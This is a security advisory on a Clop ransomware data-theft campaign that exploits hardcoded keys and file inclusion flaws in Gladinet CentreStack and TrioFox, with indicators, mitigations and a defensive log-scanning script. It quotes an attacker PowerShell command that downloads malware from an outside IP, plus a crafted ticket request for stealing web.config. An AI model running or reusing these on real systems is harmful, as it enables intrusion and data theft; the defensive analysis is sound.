The notorious Clop ransomware gang has launched a new large-scale data theft campaign targeting organizations using Gladinet CentreStack and TrioFox file-sharing platforms. Attackers are exploiting critical vulnerabilities in these systems, including hardcoded cryptographic keys and local file inclusion flaws, to steal sensitive corporate data from internet-facing servers. Over 200 organizations across healthcare, technology, and other sectors may be at risk. Recent victims have seen attackers gain unauthorized access to configuration files, execute remote code, and exfiltrate confidential information. This campaign follows Clop’s established pattern of targeting file transfer systems, similar to their previous attacks on MOVEit Transfer (which impacted over 2,770 organizations), Oracle EBS, and GoAnywhere MFT. Organizations using CentreStack or TrioFox must immediately update to version 16.12.10420.56791 or later and rotate their machine keys to prevent data theft.
What is CentreStack and Why It’s Being Targeted
Gladinet CentreStack is a popular enterprise file-sharing platform used by thousands of businesses across 49 countries. It allows organizations to securely share files stored on their own servers through web browsers, mobile apps, and mapped network drives without requiring a VPN connection. This makes it an attractive solution for companies supporting remote workers who need access to corporate files.
The platform essentially bridges traditional on-premises file storage with modern cloud-like accessibility features. Organizations can turn their existing file servers, NAS devices, or cloud storage into secure, enterprise-grade private cloud storage systems.
Unfortunately, this widespread adoption and the sensitive nature of the data stored in these systems make CentreStack an ideal target for cybercriminals like the Clop ransomware gang. When attackers compromise a CentreStack server, they gain access to an organization’s entire file repository, potentially including financial records, customer data, intellectual property, employee information, and other confidential business documents.
The Vulnerability Behind the Attacks
Security researchers from Huntress uncovered the root cause of this security crisis: CentreStack and TrioFox contain hardcoded cryptographic keys in their AES encryption implementation. This fundamental security flaw, tracked as CVE-2025-14611 with a severity score of 7.1 out of 10, allows attackers to decrypt and forge authentication tickets that normally protect file access.
The problem stems from how these applications generate encryption keys. When the CentreStack server starts, it calls an external function that returns the same static strings every time:
- The encryption key source: A hardcoded string of Chinese text
- The initialization vector source: A hardcoded string of Japanese marketing text
Because these cryptographic keys never change across installations, attackers who discover them once can use them against any vulnerable CentreStack or TrioFox server worldwide.
Additionally, attackers are exploiting CVE-2025-11371, an unauthenticated Local File Inclusion (LFI) vulnerability that allows them to retrieve sensitive configuration files without needing any login credentials. By combining these vulnerabilities, threat actors can:
- Access the server’s web.config file containing machine keys
- Use those machine keys to perform ViewState deserialization attacks
- Execute arbitrary code remotely on the compromised server
- Steal sensitive data stored on the system
How the Attack Works
The Clop ransomware group has developed a sophisticated attack chain that exploits these vulnerabilities in a step-by-step process:
Step 1: Scanning for Vulnerable Servers
Attackers scan the internet for servers displaying the “CentreStack – Login” page, identifying potential targets. Recent scan data shows at least 200 unique IP addresses running vulnerable CentreStack installations.
Step 2: Exploiting the Cryptographic Flaw
Using the hardcoded encryption keys, attackers create specially crafted “access tickets” that decrypt to reveal file paths, credentials, and timestamps. In observed attacks, threat actors set timestamps to the year 9999, creating tickets that never expire and can be reused indefinitely.
Step 3: Retrieving Configuration Files
Attackers send malicious requests to download the server’s web.config file, which contains critical machine keys needed for the next stage of the attack. One example of an encrypted request seen in the wild:
/storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu
Step 4: Executing Malicious Code
Using the stolen machine keys, attackers perform ViewState deserialization attacks to execute PowerShell commands on the server. In recent incidents observed by Huntress, attackers executed commands like:
Invoke-WebRequest http://185.196.11.207:8000/conqueror.exe -OutFile C:\Users\Public\conqueror.exe
This downloaded malware that enabled further system reconnaissance and data theft.
Step 5: Data Exfiltration
Once attackers establish a foothold, they execute enumeration commands to map the system, identify valuable data, and exfiltrate sensitive files to their own servers.
Step 6: Extortion
After stealing data, Clop leaves ransom notes on compromised servers and publishes stolen information on their dark web leak site, pressuring victims to pay ransoms to prevent public disclosure.
Clop’s Track Record of Targeting File Transfer Systems
The Clop ransomware gang (also known as Cl0p) has established itself as one of the most prolific cybercrime groups specializing in exploiting file transfer and file-sharing platforms. This Russian-speaking ransomware-as-a-service operation first appeared in February 2019 and has been behind some of the largest data theft campaigns in recent years.
Previous Major Campaigns:
- MOVEit Transfer (2023): One of the largest ransomware campaigns in history, exploiting an SQL injection zero-day (CVE-2023-34362) that impacted over 2,770 organizations worldwide, including government agencies, healthcare providers, and major corporations
- Oracle E-Business Suite (2025): Since August 2025, Clop has exploited zero-day CVE-2025-61882, stealing data from Harvard University, The Washington Post, Logitech, University of Pennsylvania, University of Phoenix, and Envoy Air (an American Airlines subsidiary)
- GoAnywhere MFT (2023): Exploited CVE-2023-0669 to compromise over 130 organizations
- Accellion FTA (2020-2021): Targeted approximately 100 organizations through zero-day vulnerabilities in this legacy file transfer appliance
- Cleo File Transfer: Exploited a zero-day remote code execution flaw in data theft attacks
High-profile victims across these campaigns include Shell, British Airways, Bombardier, University of Colorado, PwC, BBC, and multiple healthcare organizations including Barts Health NHS.
The U.S. Department of State has offered a $10 million reward for information that could link Clop’s attacks to a foreign government, underscoring the group’s significance as a national security threat.
Who Is at Risk
Any organization running internet-facing Gladinet CentreStack or TrioFox servers is potentially at risk, particularly if they haven’t applied the latest security updates. Based on intelligence from security researchers, the following are especially vulnerable:
Industries Most Affected:
- Healthcare organizations storing patient records and medical data
- Technology companies with intellectual property and source code
- Financial services firms with customer financial information
- Legal firms with confidential client files
- Manufacturing companies with proprietary designs and trade secrets
- Educational institutions with student and research data
Specific Risk Factors:
- Running CentreStack or TrioFox versions older than 16.12.10420.56791
- Having file servers exposed directly to the internet without additional security layers
- Not implementing network segmentation or access controls
- Failing to rotate machine keys after vulnerability disclosures
- Not monitoring logs for suspicious access patterns
As of mid-December 2025, Huntress has identified at least nine organizations that have been successfully compromised through these vulnerabilities, with attacks originating from multiple IP addresses including 147.124.216.205 and 146.70.134.50.
What You Should Do Now
If your organization uses CentreStack or TrioFox, you should take immediate action to protect your systems and data:
Immediate Actions (Do These Today):
- Update to the latest version: Install CentreStack or TrioFox version 16.12.10420.56791, released on November 29, 2025
- Rotate your machine keys: Follow Gladinet’s instructions to rotate machine keys in your web.config file
- Check your logs: Search server logs for the string vghpI7EToZUDIZDdprSubL3mTZ2, which indicates attempts to access the web.config file
- Review access logs: Look for unusual access patterns, especially requests to /storage/filesvr.dn with encrypted parameters
Additional Security Measures:
- Implement network segmentation: Don’t expose CentreStack servers directly to the internet; place them behind VPNs or zero-trust access solutions
- Enable multi-factor authentication: Require MFA for all administrative accounts on Gladinet systems
- Monitor for suspicious activity: Set up alerts for failed login attempts, unusual file access patterns, and configuration changes
- Back up critical data: Ensure you have offline backups that can’t be accessed or encrypted by attackers
- Review user permissions: Apply the principle of least privilege, ensuring users only have access to files they absolutely need
- Consider temporary mitigation: If you can’t update immediately, disable the temp handler in UploadDownloadProxy’s web.config (note: this will affect some functionality)
Signs Your System May Be Compromised
Watch for these indicators that your CentreStack or TrioFox server may have been breached:
Log File Indicators:
- Requests containing the encrypted string vghpI7EToZUDIZDdprSubL3mTZ2
- Connections from suspicious IP addresses like 185.196.11.207, 147.124.216.205, or 146.70.134.50
- PowerShell execution via w3wp.exe (the IIS worker process)
- Base64-encoded commands in web server logs
- Failed ViewState deserialization errors in Windows Application Event Logs
System Behavior:
- Unexpected PowerShell processes running under the IIS application pool identity
- New files appearing in the C:\Users\Public\ directory (especially files named like “conqueror.exe”)
- Unusual outbound network connections to unfamiliar IP addresses
- Configuration files being accessed at unusual times
- Ransom notes appearing on file servers
File System Changes:
- Modifications to web.config files
- New executable files in system directories
- Unexpected changes to file permissions or access control lists
- Files being copied or downloaded in bulk
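As an added example (not code from the advisory, Huntress or Gladinet), the Python check below covers the "Check your logs" step and the log and process indicators listed above: it scans IIS W3C log lines for the quoted ticket string, for /storage/filesvr.dn requests carrying an encrypted parameter and for the listed source IPs, and it flags PowerShell or cmd spawned by w3wp.exe, decoding any -enc argument for triage. All log lines and process records in it are constructed; point it at your own exported IIS logs and Sysmon/EDR process-creation events.

```python
import base64
from urllib.parse import parse_qs
# Indicators quoted in the advisory; every log line and process record below is constructed.
TICKET_PREFIX = "vghpI7EToZUDIZDdprSubL3mTZ2"
SUSPECT_IPS = {"185.196.11.207", "147.124.216.205", "146.70.134.50"}
SAMPLE_IIS_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2025-12-10 08:01:12 10.0.0.5 GET /portal/login.aspx - 200
2025-12-10 08:03:44 147.124.216.205 GET /storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:EXAMPLETOKEN 200
2025-12-10 08:05:02 203.0.113.9 GET /storage/filesvr.dn t=AAAAunrelatedticket 200
2025-12-10 08:06:30 10.0.0.7 POST /portal/default.aspx - 200
"""

def scan_iis_log(text):
    # Returns (timestamp, client ip, reasons) for each line matching the advisory's log indicators.
    fields, findings = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # W3C logs declare their own column order
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        ip, query, reasons = rec.get("c-ip", ""), rec.get("cs-uri-query", "-"), []
        if ip in SUSPECT_IPS:
            reasons.append("source IP listed in advisory")
        if rec.get("cs-uri-stem", "").lower() == "/storage/filesvr.dn" and query != "-":
            reasons.append("filesvr.dn request carrying an encrypted ticket")
            if parse_qs(query).get("t", [""])[0].startswith(TICKET_PREFIX):
                reasons.append("ticket string tied to web.config retrieval")
        if reasons:
            findings.append((f"{rec['date']} {rec['time']}", ip, reasons))
    return findings

# Process-creation records with Sysmon Event ID 1 style fields (constructed; the -enc payload is harmless).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode("Get-Process".encode("utf-16le")).decode()
SAMPLE_PROCS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": PS, "cmdline": "powershell -nop -enc " + ENCODED},
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell Get-Process"},
]

def suspicious_web_children(procs):
    # Flags shells spawned by the IIS worker process (w3wp.exe) and decodes any -enc argument for triage.
    hits = []
    for p in procs:
        if p["parent"].lower().endswith(r"\w3wp.exe") and p["image"].lower().endswith((r"\powershell.exe", r"\cmd.exe")):
            args = p["cmdline"].split()
            decoded = next((base64.b64decode(a).decode("utf-16le") for i, a in enumerate(args) if i and args[i - 1].lower() in ("-enc", "-encodedcommand")), None)
            hits.append((p["image"], decoded or p["cmdline"]))
    return hits
```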
If you observe any of these indicators, immediately disconnect the affected server from the network, preserve logs for forensic analysis, and contact your security team or a cybersecurity incident response firm. You should also report the incident to law enforcement and, depending on your industry and location, to relevant regulatory authorities.
Organizations that discover they’ve been compromised should also check if their data has been published on Clop’s dark web leak site and prepare for potential notification requirements under data breach laws like GDPR, HIPAA, or state-level regulations.
Sources
- BleepingComputer – Clop ransomware targets Gladinet CentreStack in data theft attacks
- Huntress – Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
- Security Affairs – CLOP targets Gladinet CentreStack servers in large-scale extortion campaign
- Curated Intelligence – PSA on Clop CentreStack Campaign